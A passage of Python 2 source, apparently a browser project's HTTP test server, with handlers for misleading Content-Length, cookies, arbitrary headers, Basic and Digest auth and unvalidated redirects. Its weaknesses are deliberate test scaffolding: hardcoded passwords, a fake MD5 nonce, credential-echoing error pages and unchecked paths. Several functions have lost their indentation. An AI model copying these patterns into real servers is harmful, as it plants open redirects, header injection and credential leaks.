replace_text_value)
old_text_b64, new_text_b64 = replace_text_args
old_text = base64.urlsafe_b64decode(old_text_b64)
new_text = base64.urlsafe_b64decode(new_text_b64)
data = data.replace(old_text, new_text)
return data
  def ZipFileHandler(self):
    """This handler sends the contents of the requested file in compressed form.
    Can pass in a parameter that specifies that the content length be
    C - the compressed size (OK),
    U - the uncompressed size (Non-standard, but handled),
    S - less than compressed (OK because we keep going),
    M - larger than compressed but less than uncompressed (an error),
    L - larger than uncompressed (an error)
    Example: compressedfiles/Picture_1.doc?C
    """
    prefix = "/compressedfiles/"
    if not self.path.startswith(prefix):
      return False

    # Consume a request body if present.
    if self.command == 'POST' or self.command == 'PUT' :
      self.ReadRequestBody()

    _, _, url_path, _, query, _ = urlparse.urlparse(self.path)
    if not query in ('C', 'U', 'S', 'M', 'L'):
      return False

    # Resolve the URL path below the prefix to a file in data_dir;
    # directories fall back to their index.html.
    sub_path = url_path[len(prefix):]
    entries = sub_path.split('/')
    file_path = os.path.join(self.server.data_dir, *entries)
    if os.path.isdir(file_path):
      file_path = os.path.join(file_path, 'index.html')

    if not os.path.isfile(file_path):
      print "File not found " + sub_path + " full path:" + file_path
      self.send_error(404)
      return True

    f = open(file_path, "rb")
    data = f.read()
    uncompressed_len = len(data)
    f.close()

    # Compress the data.
    data = zlib.compress(data)
    compressed_len = len(data)

    # Pick the advertised Content-Length per the query letter; values other
    # than the true compressed size deliberately mislead the client.
    content_length = compressed_len
    if query == 'U':
      content_length = uncompressed_len
    elif query == 'S':
      content_length = compressed_len / 2
    elif query == 'M':
      content_length = (compressed_len + uncompressed_len) / 2
    elif query == 'L':
      content_length = compressed_len + uncompressed_len

    self.send_response(200)
    self.send_header('Content-Type', 'application/msword')
    # Body is a zlib stream, advertised as Content-Encoding: deflate.
    self.send_header('Content-encoding', 'deflate')
    self.send_header('Connection', 'close')
    self.send_header('Content-Length', content_length)
    self.send_header('ETag', '\'' + file_path + '\'')
    self.end_headers()

    self.wfile.write(data)

    return True
def FileHandler(self):
"""This handler sends the contents of the requested file. Wow, it's like
a real webserver!"""
prefix = self.server.file_root_url
if not self.path.startswith(prefix):
return False
return self._FileHandlerHelper(prefix)
def PostOnlyFileHandler(self):
"""This handler sends the contents of the requested file on a POST."""
prefix = urlparse.urljoin(self.server.file_root_url, 'post/')
if not self.path.startswith(prefix):
return False
return self._FileHandlerHelper(prefix)
  def _FileHandlerHelper(self, prefix):
    """Serves the file named by the URL path below |prefix| from data_dir.

    Query-string controls:
      expected_body / expected_headers: reply 404 unless the request body
          or the named request headers match.
      replace_text: rewrite the file contents (see _ReplaceFileData).
    Honors simple 'bytes=start-end' Range requests (206) and, when a
    sibling '<file>.mock-http-headers' file exists, replays the status
    line and headers recorded there instead of generating them.
    """
    request_body = ''
    if self.command == 'POST' or self.command == 'PUT':
      # Consume a request body if present.
      request_body = self.ReadRequestBody()

    _, _, url_path, _, query, _ = urlparse.urlparse(self.path)
    query_dict = cgi.parse_qs(query)

    expected_body = query_dict.get('expected_body', [])
    if expected_body and request_body not in expected_body:
      self.send_response(404)
      self.end_headers()
      self.wfile.write('')
      return True

    expected_headers = query_dict.get('expected_headers', [])
    for expected_header in expected_headers:
      header_name, expected_value = expected_header.split(':')
      if self.headers.getheader(header_name) != expected_value:
        self.send_response(404)
        self.end_headers()
        self.wfile.write('')
        return True

    sub_path = url_path[len(prefix):]
    entries = sub_path.split('/')
    file_path = os.path.join(self.server.data_dir, *entries)
    if os.path.isdir(file_path):
      file_path = os.path.join(file_path, 'index.html')

    if not os.path.isfile(file_path):
      print "File not found " + sub_path + " full path:" + file_path
      self.send_error(404)
      return True

    f = open(file_path, "rb")
    data = f.read()
    f.close()

    data = self._ReplaceFileData(data, query)

    # The mock-headers file may dictate a different HTTP version; restore
    # the handler's protocol_version before returning.
    old_protocol_version = self.protocol_version

    # If file.mock-http-headers exists, it contains the headers we
    # should send.  Read them in and parse them.
    headers_path = file_path + '.mock-http-headers'
    if os.path.isfile(headers_path):
      f = open(headers_path, "r")

      # "HTTP/1.1 200 OK"
      response = f.readline()
      http_major, http_minor, status_code = re.findall(
          'HTTP/(\d+).(\d+) (\d+)', response)[0]
      self.protocol_version = "HTTP/%s.%s" % (http_major, http_minor)
      self.send_response(int(status_code))

      for line in f:
        header_values = re.findall('(\S+):\s*(.*)', line)
        if len(header_values) > 0:
          # "name: value"
          name, value = header_values[0]
          self.send_header(name, value)
      f.close()
    else:
      # Could be more generic once we support mime-type sniffing, but for
      # now we need to set it explicitly.

      range_header = self.headers.get('Range')
      if range_header and range_header.startswith('bytes='):
        # Note this doesn't handle all valid byte range_header values (i.e.
        # left open ended ones), just enough for what we needed so far.
        range_header = range_header[6:].split('-')
        start = int(range_header[0])
        if range_header[1]:
          end = int(range_header[1])
        else:
          end = len(data) - 1

        self.send_response(206)
        content_range = ('bytes ' + str(start) + '-' + str(end) + '/' +
                         str(len(data)))
        self.send_header('Content-Range', content_range)
        data = data[start: end + 1]
      else:
        self.send_response(200)

      self.send_header('Content-Type', self.GetMIMETypeFromName(file_path))
      self.send_header('Accept-Ranges', 'bytes')
      self.send_header('Content-Length', len(data))
      self.send_header('ETag', '\'' + file_path + '\'')
    self.end_headers()

    # HEAD requests get headers only, never the body.
    if (self.command != 'HEAD'):
      self.wfile.write(data)

    self.protocol_version = old_protocol_version
    return True
def SetCookieHandler(self):
"""This handler just sets a cookie, for testing cookie handling."""
if not self._ShouldHandleRequest("/set-cookie"):
return False
query_char = self.path.find('?')
if query_char != -1:
cookie_values = self.path[query_char + 1:].split('&')
else:
cookie_values = ("",)
self.send_response(200)
self.send_header('Content-Type', 'text/html')
for cookie_value in cookie_values:
self.send_header('Set-Cookie', '%s' % cookie_value)
self.end_headers()
for cookie_value in cookie_values:
self.wfile.write('%s' % cookie_value)
return True
def SetManyCookiesHandler(self):
"""This handler just sets a given number of cookies, for testing handling
of large numbers of cookies."""
if not self._ShouldHandleRequest("/set-many-cookies"):
return False
query_char = self.path.find('?')
if query_char != -1:
num_cookies = int(self.path[query_char + 1:])
else:
num_cookies = 0
self.send_response(200)
self.send_header('', 'text/html')
for _i in range(0, num_cookies):
self.send_header('Set-Cookie', 'a=')
self.end_headers()
self.wfile.write('%d cookies were sent' % num_cookies)
return True
def ExpectAndSetCookieHandler(self):
"""Expects some cookies to be sent, and if they are, sets more cookies.
The expect parameter specifies a required cookie. May be specified multiple
times.
The set parameter specifies a cookie to set if all required cookies are
preset. May be specified multiple times.
The data parameter specifies the response body data to be returned."""
if not self._ShouldHandleRequest("/expect-and-set-cookie"):
return False
_, _, _, _, query, _ = urlparse.urlparse(self.path)
query_dict = cgi.parse_qs(query)
cookies = set()
if 'Cookie' in self.headers:
cookie_header = self.headers.getheader('Cookie')
cookies.update([s.strip() for s in cookie_header.split(';')])
got_all_expected_cookies = True
for expected_cookie in query_dict.get('expect', []):
if expected_cookie not in cookies:
got_all_expected_cookies = False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
if got_all_expected_cookies:
for cookie_value in query_dict.get('set', []):
self.send_header('Set-Cookie', '%s' % cookie_value)
self.end_headers()
for data_value in query_dict.get('data', []):
self.wfile.write(data_value)
return True
def SetHeaderHandler(self):
"""This handler sets a response header. Parameters are in the
key%3A%20value&key2%3A%20value2 format."""
if not self._ShouldHandleRequest("/set-header"):
return False
query_char = self.path.find('?')
if query_char != -1:
headers_values = self.path[query_char + 1:].split('&')
else:
headers_values = ("",)
self.send_response(200)
self.send_header('Content-Type', 'text/html')
for header_value in headers_values:
header_value = urllib.unquote(header_value)
(key, value) = header_value.split(': ', 1)
self.send_header(key, value)
self.end_headers()
for header_value in headers_values:
self.wfile.write('%s' % header_value)
return True
  def AuthBasicHandler(self):
    """This handler tests 'Basic' authentication.  It just sends a page with
    title 'user/pass' if you succeed.

    Query parameters:
      password: expected password (default 'secret').
      realm: authentication realm for the 401 challenge (default 'testrealm').
      set-cookie-if-challenged: if present, the 401 challenge also sets a
          'got_challenged=true' cookie.
    Successful responses are cacheable (Etag 'abc', max-age=60000) so tests
    can exercise cached pages behind authentication.
    """
    if not self._ShouldHandleRequest("/auth-basic"):
      return False

    username = userpass = password = b64str = ""
    expected_password = 'secret'
    realm = 'testrealm'
    set_cookie_if_challenged = False

    _, _, url_path, _, query, _ = urlparse.urlparse(self.path)
    query_params = cgi.parse_qs(query, True)
    if 'set-cookie-if-challenged' in query_params:
      set_cookie_if_challenged = True
    if 'password' in query_params:
      expected_password = query_params['password'][0]
    if 'realm' in query_params:
      realm = query_params['realm'][0]

    auth = self.headers.getheader('authorization')
    try:
      if not auth:
        raise Exception('no auth')
      # Decode "Authorization: Basic <base64(user:pass)>".
      b64str = re.findall(r'Basic (\S+)', auth)[0]
      userpass = base64.b64decode(b64str)
      username, password = re.findall(r'([^:]+):(\S+)', userpass)[0]
      if password != expected_password:
        raise Exception('wrong password')
    except Exception, e:
      # Authentication failed.
      self.send_response(401)
      self.send_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
      self.send_header('Content-Type', 'text/html')
      if set_cookie_if_challenged:
        self.send_header('Set-Cookie', 'got_challenged=true')
      self.end_headers()
      # The denial page dumps everything we parsed, to ease debugging.
      self.wfile.write('<html><head>')
      self.wfile.write('<title>Denied: %s</title>' % e)
      self.wfile.write('</head><body>')
      self.wfile.write('auth=%s<p>' % auth)
      self.wfile.write('b64str=%s<p>' % b64str)
      self.wfile.write('username: %s<p>' % username)
      self.wfile.write('userpass: %s<p>' % userpass)
      self.wfile.write('password: %s<p>' % password)
      self.wfile.write('You sent:<br>%s<p>' % self.headers)
      self.wfile.write('</body></html>')
      return True

    # Authentication successful.  (Return a cachable response to allow for
    # testing cached pages that require authentication.)
    old_protocol_version = self.protocol_version
    self.protocol_version = "HTTP/1.1"

    if_none_match = self.headers.getheader('if-none-match')
    if if_none_match == "abc":
      self.send_response(304)
      self.end_headers()
    elif url_path.endswith(".gif"):
      # Using chrome/test/data/google/logo.gif as the test image
      test_image_path = ['google', 'logo.gif']
      gif_path = os.path.join(self.server.data_dir, *test_image_path)
      if not os.path.isfile(gif_path):
        self.send_error(404)
        self.protocol_version = old_protocol_version
        return True

      f = open(gif_path, "rb")
      data = f.read()
      f.close()

      self.send_response(200)
      self.send_header('Content-Type', 'image/gif')
      self.send_header('Cache-control', 'max-age=60000')
      self.send_header('Etag', 'abc')
      self.end_headers()
      self.wfile.write(data)
    else:
      self.send_response(200)
      self.send_header('Content-Type', 'text/html')
      self.send_header('Cache-control', 'max-age=60000')
      self.send_header('Etag', 'abc')
      self.end_headers()
      self.wfile.write('<html><head>')
      self.wfile.write('<title>%s/%s</title>' % (username, password))
      self.wfile.write('</head><body>')
      self.wfile.write('auth=%s<p>' % auth)
      self.wfile.write('You sent:<br>%s<p>' % self.headers)
      self.wfile.write('</body></html>')
    self.protocol_version = old_protocol_version
    return True
def GetNonce(self, force_reset=False):
"""Returns a nonce that's stable per request path for the server's lifetime.
This is a fake implementation. A real implementation would only use a given
nonce a single time (hence the name n-once). However, for the purposes of
unittesting, we don't care about the security of the nonce.
Args:
force_reset: Iff set, the nonce will be changed. Useful for testing the
"stale" response.
"""
if force_reset or not self.server.nonce_time:
self.server.nonce_time = time.time()
return hashlib.md5('privatekey%s%d' %
(self.path, self.server.nonce_time)).hexdigest()
  def AuthDigestHandler(self):
    """This handler tests 'Digest' authentication.

    It just sends a page with title 'user/pass' if you succeed.
    A stale response is sent iff "stale" is present in the request path.
    The expected password is 'secret' in realm 'testrealm'; the nonce comes
    from GetNonce (stable per path unless forced stale).
    """
    if not self._ShouldHandleRequest("/auth-digest"):
      return False

    stale = 'stale' in self.path
    nonce = self.GetNonce(force_reset=stale)
    opaque = hashlib.md5('opaque').hexdigest()
    password = 'secret'
    realm = 'testrealm'

    auth = self.headers.getheader('authorization')
    pairs = {}
    try:
      if not auth:
        raise Exception('no auth')
      if not auth.startswith('Digest'):
        raise Exception('not digest')
      # Pull out all the name="value" pairs as a dictionary.
      pairs = dict(re.findall(r'(\b[^ ,=]+)="?([^",]+)"?', auth))

      # Make sure it's all valid.
      if pairs['nonce'] != nonce:
        raise Exception('wrong nonce')
      if pairs['opaque'] != opaque:
        raise Exception('wrong opaque')

      # Check the 'response' value and make sure it matches our magic hash.
      # See http://www.ietf.org/rfc/rfc2617.txt
      hash_a1 = hashlib.md5(
          ':'.join([pairs['username'], realm, password])).hexdigest()
      hash_a2 = hashlib.md5(':'.join([self.command, pairs['uri']])).hexdigest()
      if 'qop' in pairs and 'nc' in pairs and 'cnonce' in pairs:
        response = hashlib.md5(':'.join([hash_a1, nonce, pairs['nc'],
            pairs['cnonce'], pairs['qop'], hash_a2])).hexdigest()
      else:
        response = hashlib.md5(':'.join([hash_a1, nonce, hash_a2])).hexdigest()

      if pairs['response'] != response:
        raise Exception('wrong password')
    except Exception, e:
      # Authentication failed.
      self.send_response(401)
      hdr = ('Digest '
             'realm="%s", '
             'domain="/", '
             'qop="auth", '
             'algorithm=MD5, '
             'nonce="%s", '
             'opaque="%s"') % (realm, nonce, opaque)
      if stale:
        hdr += ', stale="TRUE"'
      self.send_header('WWW-Authenticate', hdr)
      self.send_header('Content-Type', 'text/html')
      self.end_headers()
      # Dump what we parsed and what we replied, to ease debugging.
      self.wfile.write('<html><head>')
      self.wfile.write('<title>Denied: %s</title>' % e)
      self.wfile.write('</head><body>')
      self.wfile.write('auth=%s<p>' % auth)
      self.wfile.write('pairs=%s<p>' % pairs)
      self.wfile.write('You sent:<br>%s<p>' % self.headers)
      self.wfile.write('We are replying:<br>%s<p>' % hdr)
      self.wfile.write('</body></html>')
      return True

    # Authentication successful.
    self.send_response(200)
    self.send_header('Content-Type', 'text/html')
    self.end_headers()
    self.wfile.write('<html><head>')
    self.wfile.write('<title>%s/%s</title>' % (pairs['username'], password))
    self.wfile.write('</head><body>')
    self.wfile.write('auth=%s<p>' % auth)
    self.wfile.write('pairs=%s<p>' % pairs)
    self.wfile.write('</body></html>')

    return True
def SlowServerHandler(self):
"""Wait for the user suggested time before responding. The syntax is
/slow?0.5 to wait for half a second."""
if not self._ShouldHandleRequest("/slow"):
return False
query_char = self.path.find('?')
wait_sec = 1.0
if query_char >= 0:
try:
wait_sec = int(self.path[query_char + 1:])
except ValueError:
pass
time.sleep(wait_sec)
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write("waited %d seconds" % wait_sec)
return True
def ChunkedServerHandler(self):
"""Send chunked response. Allows to specify chunks parameters:
- waitBeforeHeaders - ms to wait before sending headers
- waitBetweenChunks - ms to wait between chunks
- chunkSize - size of each chunk in bytes
- chunksNumber - number of chunks
Example: /chunked?waitBeforeHeaders=1000&chunkSize=5&chunksNumber=5
waits one second, then sends headers and five chunks five bytes each."""
if not self._ShouldHandleRequest("/chunked"):
return False
query_char = self.path.find('?')
chunkedSettings = {'waitBeforeHeaders' : 0,
'waitBetweenChunks' : 0,
'chunkSize' : 5,
'chunksNumber' : 5}
if query_char >= 0:
params = self.path[query_char + 1:].split('&')
for param in params:
keyValue = param.split('=')
if len(keyValue) == 2:
try:
chunkedSettings[keyValue[0]] = int(keyValue[1])
except ValueError:
pass
time.sleep(0.001 * chunkedSettings['waitBeforeHeaders'])
self.protocol_version = 'HTTP/1.1' # Needed for chunked encoding
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Connection', 'close')
self.send_header('Transfer-Encoding', 'chunked')
self.end_headers()
# Chunked encoding: sending all chunks, then final zero-length chunk and
# then final CRLF.
for i in range(0, chunkedSettings['chunksNumber']):
if i > 0:
time.sleep(0.001 * chunkedSettings['waitBetweenChunks'])
self.sendChunkHelp('*' * chunkedSettings['chunkSize'])
self.wfile.flush() # Keep in mind that we start flushing only after 1kb.
self.sendChunkHelp('')
return True
def ContentTypeHandler(self):
"""Returns a string of html with the given content type. E.g.,
/contenttype?text/css returns an html file with the Content-Type
header set to text/css."""
if not self._ShouldHandleRequest("/contenttype"):
return False
query_char = self.path.find('?')
content_type = self.path[query_char + 1:].strip()
if not content_type:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write("<html>\n<body>\n<p>HTML text</p>\n</body>\n</html>\n")
return True
  def NoContentHandler(self):
    """Returns a 204 No Content response (no body, no Content-Type)."""
    if not self._ShouldHandleRequest("/nocontent"):
      return False
    self.send_response(204)
    self.end_headers()
    return True
def ServerRedirectHandler(self):
"""Sends a server redirect to the given URL. The syntax is
'/server-redirect?http://foo.bar/asdf' to redirect to
'http://foo.bar/asdf'"""
test_name = "/server-redirect"
if not self._ShouldHandleRequest(test_name):
return False
query_char = self.path.find('?')
if query_char < 0 or len(self.path) <= query_char + 1:
self.sendRedirectHelp(test_name)
return True
dest = urllib.unquote(self.path[query_char + 1:])
self.send_response(301) # moved permanently
self.send_header('Location', dest)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('</head><body>Redirecting to %s</body></html>' % dest)
return True
def ClientRedirectHandler(self):
"""Sends a client redirect to the given URL. The syntax is
'/client-redirect?http://foo.bar/asdf' to redirect to
'http://foo.bar/asdf'"""
test_name = "/client-redirect"
if not self._ShouldHandleRequest(test_name):
return False
query_char = self.path.find('?')
if query_char < 0 or len(self.path) <= query_char + 1:
self.sendRedirectHelp(test_name)
return True
dest = urllib.unquote(self.path[query_char + 1:])
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<meta http-equiv="refresh" content="0;url=%s">' % dest)
self.wfile.write('</head><body>Redirecting to %s</body></html>' % dest)
return True
def MultipartHandler(self):
"""Send a multipart response (10 text/html pages)."""
test_name = '/multipart'
if not self._ShouldHandleRequest(test_name):
return False
num_frames = 10
bound = '12345'
self.send_response(200)
self.send_header('Content-Type',
'multipart/x-mixed-replace;boundary=' + bound)
self.end_headers()
for i in xrange(num_frames):
self.wfile.write('--' + bound + '\r\n')
self.wfile.write('Content-Type: text/html\r\n\r\n')
self.wfile.write('<title>page ' + str(i) + '</title>')
self.wfile.write('page ' + str(i))
self.wfile.write('--' + bound + '--')
return True
def GetSSLSessionCacheHandler(self):
  """Replies with a plain-text log of the TLS session cache operations."""
  if not self._ShouldHandleRequest('/ssl-session-cache'):
    return False

  self.send_response(200)
  self.send_header('Content-Type', 'text/plain')
  self.end_headers()
  try:
    cache_log = self.server.session_cache.log
  except AttributeError:
    # The server was started without session-cache recording, so there is
    # no log object to walk.
    self.wfile.write('Pass --https-record-resume in order to use' +
                     ' this request')
    return True
  for (action, session_id) in cache_log:
    self.wfile.write('%s\t%s\n' % (action, session_id.encode('hex')))
  return True
def SSLManySmallRecords(self):
"""Sends a reply consisting of a variety of small writes. These will be
translated into a series of small SSL records when used over an HTTPS
server."""
if not self._ShouldHandleRequest('/ssl-many-small-records'):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
# Write ~26K of data, in 1350 byte chunks
for i in xrange(20):
self.wfile.write('*' * 1350)
self.wfile.flush()
return True
def GetChannelID(self):
  """Replies with the base64 SHA-256 digest of the client's Channel ID."""
  if not self._ShouldHandleRequest('/channel-id'):
    return False

  self.send_response(200)
  self.send_header('Content-Type', 'text/plain')
  self.end_headers()
  channel_id = self.server.tlsConnection.channel_id.tostring()
  digest = hashlib.sha256(channel_id).digest()
  self.wfile.write(digest.encode('base64'))
  return True
def CloseSocketHandler(self):
  """Drops the connection without writing a single response byte."""
  if not self._ShouldHandleRequest('/close-socket'):
    return False

  self.wfile.close()
  return True
def RangeResetHandler(self):
  """Sends data broken up by connection resets every N (default 4K) bytes.

  Supports byte-range requests. If the data requested doesn't straddle a
  reset boundary, it will all be sent. Used for testing resuming downloads.

  Recognized query parameters: size, rst_boundary, token, rst_limit,
  bounce_range, hold, no_verifiers, fail_precondition.
  """
  def DataForRange(start, end):
    """Data to be provided for a particular range of bytes."""
    # Offset and scale to avoid too obvious (and hence potentially
    # collidable) data.
    return ''.join([chr(y % 256)
                    for y in range(start * 2 + 15, end * 2 + 15, 2)])

  if not self._ShouldHandleRequest('/rangereset'):
    return False

  # Only the query string of the request URL is needed.
  query = urlparse.urlparse(self.path).query

  # Defaults
  size = 8000
  # Note that the rst is sent just before sending the rst_boundary byte.
  rst_boundary = 4000
  respond_to_range = True
  hold_for_signal = False
  rst_limit = -1
  token = 'DEFAULT'
  fail_precondition = 0
  send_verifiers = True

  # Parse the query.
  qdict = urlparse.parse_qs(query, True)
  if 'size' in qdict:
    size = int(qdict['size'][0])
  if 'rst_boundary' in qdict:
    rst_boundary = int(qdict['rst_boundary'][0])
  if 'token' in qdict:
    # Identifying token for stateful tests.
    token = qdict['token'][0]
  if 'rst_limit' in qdict:
    # Max number of rsts for a given token.
    rst_limit = int(qdict['rst_limit'][0])
  if 'bounce_range' in qdict:
    respond_to_range = False
  if 'hold' in qdict:
    # Note that hold_for_signal will not work with null range requests;
    # see TODO below.
    hold_for_signal = True
  if 'no_verifiers' in qdict:
    send_verifiers = False
  if 'fail_precondition' in qdict:
    fail_precondition = int(qdict['fail_precondition'][0])

  # Record already set information, or set it.
  rst_limit = TestPageHandler.rst_limits.setdefault(token, rst_limit)
  if rst_limit != 0:
    TestPageHandler.rst_limits[token] -= 1
  fail_precondition = TestPageHandler.fail_precondition.setdefault(
      token, fail_precondition)
  if fail_precondition != 0:
    TestPageHandler.fail_precondition[token] -= 1

  first_byte = 0
  last_byte = size - 1

  # Does that define what we want to return, or do we need to apply
  # a range?
  range_response = False
  range_header = self.headers.getheader('range')
  if range_header and respond_to_range:
    mo = re.match(r"bytes=(\d*)-(\d*)", range_header)
    # BUG FIX: a Range header that does not match the pattern used to
    # crash with an AttributeError on mo.group(); such headers are now
    # ignored and the full entity is served instead.
    if mo:
      if mo.group(1):
        first_byte = int(mo.group(1))
      if mo.group(2):
        last_byte = int(mo.group(2))
        if last_byte > size - 1:
          last_byte = size - 1
      range_response = True

  if last_byte < first_byte:
    return False

  if (fail_precondition and
      (self.headers.getheader('If-Modified-Since') or
       self.headers.getheader('If-Match'))):
    self.send_response(412)
    self.end_headers()
    return True

  if range_response:
    self.send_response(206)
    self.send_header('Content-Range',
                     'bytes %d-%d/%d' % (first_byte, last_byte, size))
  else:
    self.send_response(200)
  self.send_header('Content-Type', 'application/octet-stream')
  self.send_header('Content-Length', last_byte - first_byte + 1)
  if send_verifiers:
    self.send_header('Etag', '"XYZZY"')
    self.send_header('Last-Modified', 'Tue, 19 Feb 2013 14:32 EST')
  self.end_headers()

  if hold_for_signal:
    # TODO(rdsmith/phajdan.jr): http://crbug.com/169519: Without writing
    # a single byte, the self.server.handle_request() below hangs
    # without processing new incoming requests.
    self.wfile.write(DataForRange(first_byte, first_byte + 1))
    first_byte = first_byte + 1
    # handle requests until one of them clears this flag.
    self.server.wait_for_download = True
    while self.server.wait_for_download:
      self.server.handle_request()

  # Integer division ('//') behaves identically to '/' for ints under
  # Python 2 and keeps the arithmetic correct under Python 3.
  possible_rst = ((first_byte // rst_boundary) + 1) * rst_boundary
  if possible_rst >= last_byte or rst_limit == 0:
    # No RST has been requested in this range, so we don't need to
    # do anything fancy; just write the data and let the python
    # infrastructure close the connection.
    self.wfile.write(DataForRange(first_byte, last_byte + 1))
    self.wfile.flush()
    return True

  # We're resetting the connection part way in; go to the RST
  # boundary and then send an RST.
  # Because socket semantics do not guarantee that all the data will be
  # sent when using the linger semantics to hard close a socket,
  # we send the data and then wait for our peer to release us
  # before sending the reset.
  data = DataForRange(first_byte, possible_rst)
  self.wfile.write(data)
  self.wfile.flush()
  self.server.wait_for_download = True
  while self.server.wait_for_download:
    self.server.handle_request()
  l_onoff = 1  # Linger is active.
  l_linger = 0  # Seconds to linger for.
  self.connection.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                             struct.pack('ii', l_onoff, l_linger))

  # Close all duplicates of the underlying socket to force the RST.
  self.wfile.close()
  self.rfile.close()
  self.connection.close()

  return True
def DefaultResponseHandler(self):
  """Catch-all handler for requests no special handler above claimed.

  An explicit Content-Length is sent because without it an https
  connection is not closed properly (the browser keeps expecting data).
  """
  contents = "Default response given for path: " + self.path
  self.send_response(200)
  self.send_header('Content-Type', 'text/html')
  self.send_header('Content-Length', len(contents))
  self.end_headers()
  # HEAD responses carry headers only, never a body.
  if self.command != 'HEAD':
    self.wfile.write(contents)
  return True
def RedirectConnectHandler(self):
  """Answers CONNECT requests for www.redirect.com with a 302 redirect.

  Redirecting a CONNECT is not specified by the RFC, so a correct browser
  must refuse to follow it.
  """
  if self.path.find("www.redirect.com") < 0:
    return False

  dest = "http://www.destination.com/foo.js"

  self.send_response(302)  # moved temporarily
  self.send_header('Location', dest)
  self.send_header('Connection', 'close')
  self.end_headers()
  return True
def ServerAuthConnectHandler(self):
  """Answers CONNECT requests for www.server-auth.com with a 401.

  The response is deliberately nonsensical: a proxy cannot demand server
  authentication, so the client should treat this as an error.
  """
  if self.path.find("www.server-auth.com") < 0:
    return False

  challenge = 'Basic realm="WallyWorld"'

  self.send_response(401)  # unauthorized
  self.send_header('WWW-Authenticate', challenge)
  self.send_header('Connection', 'close')
  self.end_headers()
  return True
def DefaultConnectResponseHandler(self):
  """Catch-all for CONNECT requests no special handler above claimed.

  Mirrors real web servers, which respond to CONNECT with a 400.
  """
  contents = "Your client has issued a malformed or illegal request."
  self.send_response(400)  # bad request
  self.send_header('Content-Type', 'text/html')
  self.send_header('Content-Length', len(contents))
  self.end_headers()
  self.wfile.write(contents)
  return True
# Invoked by the redirect handlers when no destination URL was supplied.
def sendRedirectHelp(self, redirect_name):
  """Serves a small HTML page explaining the redirect query syntax."""
  self.send_response(200)
  self.send_header('Content-Type', 'text/html')
  self.end_headers()
  body = ('<html><body><h1>Error: no redirect destination</h1>'
          'Use <pre>%s?http://dest...</pre>'
          '</body></html>') % redirect_name
  self.wfile.write(body)
# Invoked by the chunked-transfer handlers to emit a single HTTP chunk.
def sendChunkHelp(self, chunk):
  """Writes one chunked-encoding chunk: hex size, CRLF, body, CRLF."""
  self.wfile.write('%X\r\n%s\r\n' % (len(chunk), chunk))
class OCSPHandler(testserver_base.BasePageHandler):
  """Page handler for the standalone OCSP helper server.

  Every handled request is answered with the pre-computed DER-encoded
  OCSP response stashed on the server object by the certificate
  generation code.
  """

  def __init__(self, request, client_address, socket_server):
    handlers = [self.OCSPResponse]
    # DER bytes produced when the test certificate was generated.
    self.ocsp_response = socket_server.ocsp_response
    # The same handler list is passed in two of BasePageHandler's
    # per-method handler slots (presumably GET and POST — confirm against
    # testserver_base.BasePageHandler's signature).
    testserver_base.BasePageHandler.__init__(self, request, client_address,
                                             socket_server, [], handlers, [],
                                             handlers, [])

  def OCSPResponse(self):
    """Writes the canned OCSP response with its proper MIME type."""
    self.send_response(200)
    self.send_header('Content-Type', 'application/ocsp-response')
    self.send_header('Content-Length', str(len(self.ocsp_response)))
    self.end_headers()

    self.wfile.write(self.ocsp_response)
class TCPEchoHandler(SocketServer.BaseRequestHandler):
  """Request handler for the TCP echo server.

  One instance is created per connection; handle() validates the incoming
  "echo request" and writes back the matching "echo response".
  """

  def handle(self):
    """Reads one request from the client and echoes a validated response."""
    data = self.request.recv(65536).strip()
    # Only reply when the payload decodes as a well-formed echo request.
    try:
      reply = echo_message.GetEchoResponseData(data)
    except ValueError:
      return
    if not reply:
      return
    self.request.send(reply)
class UDPEchoHandler(SocketServer.BaseRequestHandler):
  """Request handler for the UDP echo server.

  One instance is created per datagram; handle() validates the incoming
  "echo request" and sends back the matching "echo response".
  """

  def handle(self):
    """Validates the received datagram and echoes a response to its sender."""
    datagram = self.request[0].strip()
    reply_socket = self.request[1]
    # Only reply when the payload decodes as a well-formed echo request.
    try:
      reply = echo_message.GetEchoResponseData(datagram)
    except ValueError:
      return
    if not reply:
      return
    reply_socket.sendto(reply, self.client_address)
class BasicAuthProxyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  """A request handler that behaves as a proxy server which requires
  basic authentication. Only CONNECT, GET and HEAD is supported for now.
  """

  _AUTH_CREDENTIAL = 'Basic Zm9vOmJhcg=='  # foo:bar

  def parse_request(self):
    """Overrides parse_request to check the proxy credential first."""
    if not BaseHTTPServer.BaseHTTPRequestHandler.parse_request(self):
      return False

    auth = self.headers.getheader('Proxy-Authorization')
    if auth != self._AUTH_CREDENTIAL:
      self.send_response(407)
      self.send_header('Proxy-Authenticate', 'Basic realm="MyRealm1"')
      self.end_headers()
      return False

    return True

  def _start_read_write(self, sock):
    """Shuttles bytes between the client connection and |sock| until either
    side closes or select() reports an error."""
    sock.setblocking(0)
    self.request.setblocking(0)
    rlist = [self.request, sock]
    while True:
      ready_sockets, _unused, errors = select.select(rlist, [], [])
      if errors:
        self.send_response(500)
        self.end_headers()
        return
      for s in ready_sockets:
        received = s.recv(1024)
        if len(received) == 0:
          # Peer closed; stop tunnelling.
          return
        if s == self.request:
          other = sock
        else:
          other = self.request
        other.send(received)

  def _do_common_method(self):
    """Forwards a GET/HEAD request to the origin server named in the URL."""
    url = urlparse.urlparse(self.path)
    port = url.port
    if not port:
      if url.scheme == 'http':
        port = 80
      elif url.scheme == 'https':
        port = 443
    if not url.hostname or not port:
      self.send_response(400)
      self.end_headers()
      return

    if len(url.path) == 0:
      path = '/'
    else:
      path = url.path
    if len(url.query) > 0:
      path = '%s?%s' % (url.path, url.query)

    sock = None
    try:
      sock = socket.create_connection((url.hostname, port))
      sock.send('%s %s %s\r\n' % (
          self.command, path, self.protocol_version))
      for header in self.headers.headers:
        header = header.strip()
        # Hop-by-hop and proxy-specific headers must not be forwarded.
        if (header.lower().startswith('connection') or
            header.lower().startswith('proxy')):
          continue
